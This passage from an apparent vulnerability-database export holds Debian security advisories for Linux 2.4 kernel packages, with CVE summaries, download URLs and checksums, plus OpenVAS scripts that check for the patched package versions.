http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-s390/kernel-patch-2.4.17-s390_0.0.20020816.orig.tar.gz\n Size/MD5 checksum: 338001 5979fbe7c3325033536dfd3914e22dbd\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-s390/kernel-image-2.4.17-s390_2.4.17-2.woody.3.dsc\n Size/MD5 checksum: 793 fd4b67d1ba928ded93263c2d95327b65\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-s390/kernel-image-2.4.17-s390_2.4.17-2.woody.3.tar.gz\n Size/MD5 checksum: 7866 50f9e176f8d7fbf6eb6124bf864e6c48\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-s390/kernel-patch-2.4.17-s390_0.0.20020816-0.woody.2_all.deb\n Size/MD5 checksum: 300766 03b0017cad1c479c4109c0ad5f072ab0\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-s390/kernel-headers-2.4.17_2.4.17-2.woody.3_s390.deb\n Size/MD5 checksum: 3335312 84663c81b952cfa9407c84985f5623d7\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-s390/kernel-image-2.4.17-s390_2.4.17-2.woody.3_s390.deb\n Size/MD5 checksum: 1342758 b5cd48b7cde59c3893c983d95e451a23\n\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 1, "reporter": "Debian", "published": "2004-02-19T00:00:00", "title": "[SECURITY] [DSA 442-1] New Linux 2.4.17 packages fix local root exploits and more (s390)", "type": "debian", "enchantments": {"score": {"modified": "2018-10-16T22:13:36", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2003-0248", "CVE-2003-0961", "CVE-2003-0247", "CVE-2002-0429", "CVE-2003-0985", "CVE-2003-0364", "CVE-2003-0001", "CVE-2003-0246", "CVE-2003-0244", "CVE-2004-0077"], "modified": "2004-02-19T00:00:00", "id": "DEBIAN:DSA-442-1:2E9B0", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00038.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-16T22:14:00", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "3", "packageVersion": "kernel-image-2.4.17-ia64", "arch": "all", "packageFilename": "kernel-image-2.4.17-mckinley-smp_kernel-image-2.4.17-ia64_all.deb", "packageName": "kernel-image-2.4.17-mckinley-smp", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3", "packageVersion": "kernel-image-2.4.17-ia64", "arch": "all", "packageFilename": "kernel-image-2.4.17-mckinley_kernel-image-2.4.17-ia64_all.deb", "packageName": "kernel-image-2.4.17-mckinley", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3", "packageVersion": "kernel-image-2.4.17-ia64", "arch": "all", "packageFilename": "kernel-image-2.4.17-itanium-smp_kernel-image-2.4.17-ia64_all.deb", "packageName": "kernel-image-2.4.17-itanium-smp", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3", "packageVersion": "kernel-image-2.4.17-ia64", "arch": "all", "packageFilename": "kernel-source-2.4.17-ia64_kernel-image-2.4.17-ia64_all.deb", "packageName": "kernel-source-2.4.17-ia64", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3", "packageVersion": "kernel-image-2.4.17-ia64", "arch": "all", "packageFilename": "kernel-image-2.4.17-itanium_kernel-image-2.4.17-ia64_all.deb", "packageName": "kernel-image-2.4.17-itanium", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3", "packageVersion": "kernel-image-2.4.17-ia64", "arch": "all", "packageFilename": "kernel-image-2.4.17-ia64_kernel-image-2.4.17-ia64_all.deb", "packageName": "kernel-image-2.4.17-ia64", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3", "packageVersion": "kernel-image-2.4.17-ia64", "arch": "all", "packageFilename": "kernel-headers-2.4.17-ia64_kernel-image-2.4.17-ia64_all.deb", "packageName": "kernel-headers-2.4.17-ia64", "operator": "lt"}], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 423-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nJanuary 15th, 2004 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : kernel-image-2.4.17-ia64\nVulnerability : several\nProblem-Type : local, remote\nDebian-specific: no\nCVE IDs : CAN-2003-0001 CAN-2003-0018 CAN-2003-0127 CAN-2003-0461 CAN-2003-0462 CAN-2003-0476 CAN-2003-0501 CAN-2003-0550 CAN-2003-0551 CAN-2003-0552 CAN-2003-0961 CAN-2003-0985\n\nThe IA-64 maintainers fixed several security related bugs in the Linux\nkernel 2.4.17 used for the IA-64 architecture, mostly by backporting\nfixes from 2.4.18. The corrections are listed below with the\nidentification from the Common Vulnerabilities and Exposures (CVE)\nproject:\n\nCAN-2003-0001:\n\n Multiple ethernet network interface card (NIC) device drivers do\n not pad frames with null bytes, which allows remote attackers to\n obtain information from previous packets or kernel memory by using\n malformed packets, as demonstrated by Etherleak.\n\nCAN-2003-0018:\n\n Linux kernel 2.4.10 through 2.4.21-pre4 does not properly handle\n the O_DIRECT feature, which allows local attackers with write\n privileges to read portions of previously deleted files, or cause\n file system corruption.\n\nCAN-2003-0127:\n\n The kernel module loader in Linux kernel 2.2.x before 2.2.25, and\n 2.4.x before 2.4.21, allows local users to gain root privileges\n by using ptrace to attach to a child process which is spawned by\n the kernel.\n\nCAN-2003-0461:\n\n The virtual file /proc/tty/driver/serial in Linux 2.4.x reveals\n the exact number of characters used in serial links, which could\n allow local users to obtain potentially sensitive information such\n as the length of passwords.\n\nCAN-2003-0462:\n\n A race condition in the way env_start and env_end pointers are\n initialized in the execve system call and used in fs/proc/base.c\n on Linux 2.4 allows local users to cause a denial of service\n (crash).\n\nCAN-2003-0476:\n\n The execve system call in Linux 2.4.x records the file descriptor\n of the executable process in the file table of the calling\n process, which allows local users to gain read access to\n restricted file descriptors.\n\nCAN-2003-0501:\n\n The /proc filesystem in Linux allows local users to obtain\n sensitive information by opening various entries in /proc/self\n before executing a setuid program, which causes the program to\n fail to change the ownership and permissions of those entries.\n\nCAN-2003-0550:\n\n The STP protocol, as enabled in Linux 2.4.x, does not provide\n sufficient security by design, which allows attackers to modify\n the bridge topology.\n\nCAN-2003-0551:\n\n The STP protocol implementation in Linux 2.4.x does not properly\n verify certain lengths, which could allow attackers to cause a\n denial of service.\n\nCAN-2003-0552:\n\n Linux 2.4.x allows remote attackers to spoof the bridge Forwarding\n table via forged packets whose source addresses are the same as\n the target.\n\nCAN-2003-0961:\n\n An integer overflow in brk system call (do_brk function) for Linux\n kernel 2.4.22 and earlier allows local users to gain root\n privileges.\n\nCAN-2003-0985:\n\n The mremap system call (do_mremap) in Linux kernel 2.4 and 2.6\n does not properly perform boundary checks, which allows local\n users to cause a denial of service and possibly gain privileges by\n causing a remapping of a virtual memory area (VMA) to create a\n zero length VMA.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion kernel-image-2.4.17-ia64 for the ia64 architecture. Other\narchitectures are already or will be fixed separately.\n\nFor the unstable distribution (sid) this problem will be fixed soon\nwith newly uploaded packages.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-ia64_011226.15.dsc\n Size/MD5 checksum: 736 cfd30b9d49a8e701ce13760cf619c3e8\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-ia64_011226.15.tar.gz\n Size/MD5 checksum: 25403798 8c2cfd213fd07b06cc11e69201d15679\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-source-2.4.17-ia64_011226.15_all.deb\n Size/MD5 checksum: 24731332 d2a7dea12be6f7ca4a1a71a4ca7630f5\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-headers-2.4.17-ia64_011226.15_ia64.deb\n Size/MD5 checksum: 3636070 eab1dfc65ae7fc48566921d5bffdb78e\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-itanium_011226.15_ia64.deb\n Size/MD5 checksum: 7022040 67192d2704da8a0b76598c7cfcff34d1\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-itanium-smp_011226.15_ia64.deb\n Size/MD5 checksum: 7169484 d586b39c26904208de614ca51714b4c9\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-mckinley_011226.15_ia64.deb\n Size/MD5 checksum: 7012458 11849128d636125bdf83fd3959c6a6cf\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-mckinley-smp_011226.15_ia64.deb\n Size/MD5 checksum: 7163498 87b87cfbaccbe8e95c8df4e3fe00acee\n\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 1, "reporter": "Debian", "published": "2004-01-15T00:00:00", "title": "[SECURITY] [DSA 423-1] New Linux 2.4.17 packages fix several problems (ia64)", "type": "debian", "enchantments": {"score": {"modified": "2018-10-16T22:14:00", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2003-0961", "CVE-2003-0461", "CVE-2003-0985", "CVE-2003-0127", "CVE-2003-0001", "CVE-2003-0501", "CVE-2003-0552", "CVE-2003-0476", "CVE-2003-0462", "CVE-2003-0018", "CVE-2003-0551", "CVE-2003-0550"], "modified": "2004-01-15T00:00:00", "id": "DEBIAN:DSA-423-1:85DBD", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00018.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-24T12:50:03", "references": [], "pluginID": "53601", "description": "The remote host is missing an update to kernel-patch-2.4.18-powerpc\nannounced via advisory DSA 312-1.", "edition": 2, "reporter": "Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com", "published": "2008-01-17T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "title": "Debian Security Advisory DSA 312-1 (kernel-patch-2.4.18-powerpc)", "type": "openvas", "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0248", "CVE-2003-0247", "CVE-2002-0429", "CVE-2003-0127", "CVE-2003-0364", "CVE-2003-0001", "CVE-2003-0246", "CVE-2003-0244"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=53601", "id": "OPENVAS:53601", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_312_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 312-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A number of vulnerabilities have been discovered in the Linux kernel.\n\n- - CVE-2002-0429: The iBCS routines in arch/i386/kernel/traps.c for\nLinux kernels 2.4.18 and earlier on x86 systems allow local users to\nkill arbitrary processes via a a binary compatibility interface\n(lcall)\n\n- - CVE-2003-0001: Multiple ethernet Network Interface Card (NIC) device\ndrivers do not pad frames with null bytes, which allows remote\nattackers to obtain information from previous packets or kernel\nmemory by using malformed packets\n\n- - CVE-2003-0127: The kernel module loader allows local users to gain\nroot privileges by using ptrace to attach to a child process that is\nspawned by the kernel\n\n- - CVE-2003-0244: The route cache implementation in Linux 2.4, and the\nNetfilter IP conntrack module, allows remote attackers to cause a\ndenial of service (CPU consumption) via packets with forged source\naddresses that cause a large number of hash table collisions related\nto the PREROUTING chain\n\n- - CVE-2003-0246: The ioperm system call in Linux kernel 2.4.20 and\nearlier does not properly restrict privileges, which allows local\nusers to gain read or write access to certain I/O ports.\n\n- - CVE-2003-0247: vulnerability in the TTY layer of the Linux kernel\n2.4 allows attackers to cause a denial of service ('kernel oops')\n\n- - CVE-2003-0248: The mxcsr code in Linux kernel 2.4 allows attackers\nto modify CPU state registers via a malformed address.\n\n- - CVE-2003-0364: The TCP/IP fragment reassembly handling in the Linux\nkernel 2.4 allows remote attackers to cause a denial of service (CPU\nconsumption) via certain packets that cause a large number of hash\ntable collisions\n\nThis advisory covers only the powerpc architecture. Other\narchitectures will be covered by separate advisories.\n\nFor the stable distribution (woody) on the powerpc architecture, these\nproblems have been fixed in version 2.4.18-1woody1.\n\nFor the unstable distribution (sid) these problems are fixed in\nversion 2.4.20-2.\n\nWe recommend that you update your kernel packages.\n\nNOTE: A system reboot will be required immediately after the upgrade\nin order to replace the running kernel. Remember to read carefully\nand follow the instructions given during the kernel upgrade process.\";\ntag_summary = \"The remote host is missing an update to kernel-patch-2.4.18-powerpc\nannounced via advisory DSA 312-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20312-1\";\n\nif(description)\n{\n script_id(53601);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:36:24 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2002-0429\", \"CVE-2003-0001\", \"CVE-2003-0127\", \"CVE-2003-0244\", \"CVE-2003-0246\", \"CVE-2003-0247\", \"CVE-2003-0248\", \"CVE-2003-0364\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 312-1 (kernel-patch-2.4.18-powerpc)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"kernel-patch-2.4.18-powerpc\", ver:\"2.4.18-1woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.18\", ver:\"2.4.18-1woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-newpmac\", ver:\"2.4.18-1woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-powerpc\", ver:\"2.4.18-1woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-powerpc-smp\", ver:\"2.4.18-1woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:13", "references": [], "pluginID": "53625", "description": "The remote host is missing an update to kernel-source-2.2.20, kernel-image-2.2.20-i386\nannounced via advisory DSA 336-1.", "edition": 2, "reporter": "Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com", "published": "2008-01-17T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "title": "Debian Security Advisory DSA 336-1 (kernel-source-2.2.20, kernel-image-2.2.20-i386)", "type": "openvas", "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0248", "CVE-2003-0247", "CVE-2002-0429", "CVE-2003-0127", "CVE-2003-0364", "CVE-2003-0001", "CVE-2003-0246", "CVE-2003-0244"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=53625", "id": "OPENVAS:53625", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_336_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 336-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A number of vulnerabilities have been discovered in the Linux kernel.\n\n- - CVE-2002-0429: The iBCS routines in arch/i386/kernel/traps.c for\nLinux kernels 2.4.18 and earlier on x86 systems allow local users to\nkill arbitrary processes via a a binary compatibility interface\n(lcall)\n\n- - CVE-2003-0001: Multiple ethernet Network Interface Card (NIC) device\ndrivers do not pad frames with null bytes, which allows remote\nattackers to obtain information from previous packets or kernel\nmemory by using malformed packets\n\n- - CVE-2003-0127: The kernel module loader allows local users to gain\nroot privileges by using ptrace to attach to a child process that is\nspawned by the kernel\n\n- - CVE-2003-0244: The route cache implementation in Linux 2.4, and the\nNetfilter IP conntrack module, allows remote attackers to cause a\ndenial of service (CPU consumption) via packets with forged source\naddresses that cause a large number of hash table collisions related\nto the PREROUTING chain\n\n- - CVE-2003-0246: The ioperm system call in Linux kernel 2.4.20 and\nearlier does not properly restrict privileges, which allows local\nusers to gain read or write access to certain I/O ports.\n\n- - CVE-2003-0247: vulnerability in the TTY layer of the Linux kernel\n2.4 allows attackers to cause a denial of service ('kernel oops')\n\n- - CVE-2003-0248: The mxcsr code in Linux kernel 2.4 allows attackers\nto modify CPU state registers via a malformed address.\n\n- - CVE-2003-0364: The TCP/IP fragment reassembly handling in the Linux\nkernel 2.4 allows remote attackers to cause a denial of service (CPU\nconsumption) via certain packets that cause a large number of hash\ntable collisions\n\nThis advisory provides updated 2.2.20 kernel source, and binary kernel\nimages for the i386 architecture. Other architectures and kernel\nversions will be covered by separate advisories.\n\nFor the stable distribution (woody) on the powerpc architecture, these\nproblems have been fixed in kernel-source-2.2.20 version\n2.2.20-5woody2 and kernel-image-i386 version 2.2.20-5woody3.\n\nFor the unstable distribution (sid) these problems are fixed in\nkernel-source-2.2.25 and kernel-image-2.2.25-i386 version 2.2.25-2.\n\nWe recommend that you update your kernel packages.\n\nNOTE: A system reboot will be required immediately after the upgrade\nin order to replace the running kernel. Remember to read carefully\nand follow the instructions given during the kernel upgrade process.\n\nNOTE: These kernels are not binary-compatible with the previous\nversion. Any loadable modules will need to be recompiled in order to\nwork with the new kernel.\";\ntag_summary = \"The remote host is missing an update to kernel-source-2.2.20, kernel-image-2.2.20-i386\nannounced via advisory DSA 336-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20336-1\";\n\nif(description)\n{\n script_id(53625);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:36:24 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2002-0429\", \"CVE-2003-0001\", \"CVE-2003-0127\", \"CVE-2003-0244\", \"CVE-2003-0246\", \"CVE-2003-0247\", \"CVE-2003-0248\", \"CVE-2003-0364\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 336-1 (kernel-source-2.2.20, kernel-image-2.2.20-i386)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"kernel-doc-2.2.20\", ver:\"2.2.20-5woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-source-2.2.20\", ver:\"2.2.20-5woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.2.20\", ver:\"2.2.20-5woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.2.20-compact\", ver:\"2.2.20-5woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.2.20-idepci\", ver:\"2.2.20-5woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.20\", ver:\"2.2.20-5woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.20-compact\", ver:\"2.2.20-5woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.20-idepci\", ver:\"2.2.20-5woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:23", "references": [], "pluginID": "53621", "description": "The remote host is missing an update to kernel-source-2.4.17, kernel-patch-2.4.17-mips\nannounced via advisory DSA 332-1.", "edition": 2, "reporter": "Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com", "published": "2008-01-17T00:00:00", "title": "Debian Security Advisory DSA 332-1 (kernel-source-2.4.17, kernel-patch-2.4.17-mips)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0248", "CVE-2003-0247", "CVE-2002-0429", "CVE-2003-0127", "CVE-2003-0364", "CVE-2003-0001", "CVE-2003-0246", "CVE-2003-0244"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=53621", "id": "OPENVAS:53621", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_332_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 332-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A number of vulnerabilities have been discovered in the Linux kernel.\n\n- - CVE-2002-0429: The iBCS routines in arch/i386/kernel/traps.c for\nLinux kernels 2.4.18 and earlier on x86 systems allow local users to\nkill arbitrary processes via a a binary compatibility interface\n(lcall)\n\n- - CVE-2003-0001: Multiple ethernet Network Interface Card (NIC) device\ndrivers do not pad frames with null bytes, which allows remote\nattackers to obtain information from previous packets or kernel\nmemory by using malformed packets\n\n- - CVE-2003-0127: The kernel module loader allows local users to gain\nroot privileges by using ptrace to attach to a child process that is\nspawned by the kernel\n\n- - CVE-2003-0244: The route cache implementation in Linux 2.4, and the\nNetfilter IP conntrack module, allows remote attackers to cause a\ndenial of service (CPU consumption) via packets with forged source\naddresses that cause a large number of hash table collisions related\nto the PREROUTING chain\n\n- - CVE-2003-0246: The ioperm system call in Linux kernel 2.4.20 and\nearlier does not properly restrict privileges, which allows local\nusers to gain read or write access to certain I/O ports.\n\n- - CVE-2003-0247: vulnerability in the TTY layer of the Linux kernel\n2.4 allows attackers to cause a denial of service ('kernel oops')\n\n- - CVE-2003-0248: The mxcsr code in Linux kernel 2.4 allows attackers\nto modify CPU state registers via a malformed address.\n\n- - CVE-2003-0364: The TCP/IP fragment reassembly handling in the Linux\nkernel 2.4 allows remote attackers to cause a denial of service (CPU\nconsumption) via certain packets that cause a large number of hash\ntable collisions\n\nThis advisory provides corrected source code for Linux 2.4.17, and\ncorrected binary kernel images for the mips and mipsel architectures.\nOther versions and architectures will be covered by separate\nadvisories.\n\nFor the stable distribution (woody), these problems have been fixed in\nkernel-source-2.4.17 version 2.4.17-1woody1 and\nkernel-patch-2.4.17-mips version 2.4.17-0.020226.2.woody2.\n\nFor the unstable distribution (sid) these problems are fixed in\nkernel-source-2.4.20 version 2.4.20-8.\n\nWe recommend that you update your kernel packages.\n\nNOTE: A system reboot will be required immediately after the upgrade\nin order to replace the running kernel. Remember to read carefully\nand follow the instructions given during the kernel upgrade process.\";\ntag_summary = \"The remote host is missing an update to kernel-source-2.4.17, kernel-patch-2.4.17-mips\nannounced via advisory DSA 332-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20332-1\";\n\nif(description)\n{\n script_id(53621);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:36:24 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2002-0429\", \"CVE-2003-0001\", \"CVE-2003-0127\", \"CVE-2003-0244\", \"CVE-2003-0246\", \"CVE-2003-0247\", \"CVE-2003-0248\", \"CVE-2003-0364\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 332-1 (kernel-source-2.4.17, kernel-patch-2.4.17-mips)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n 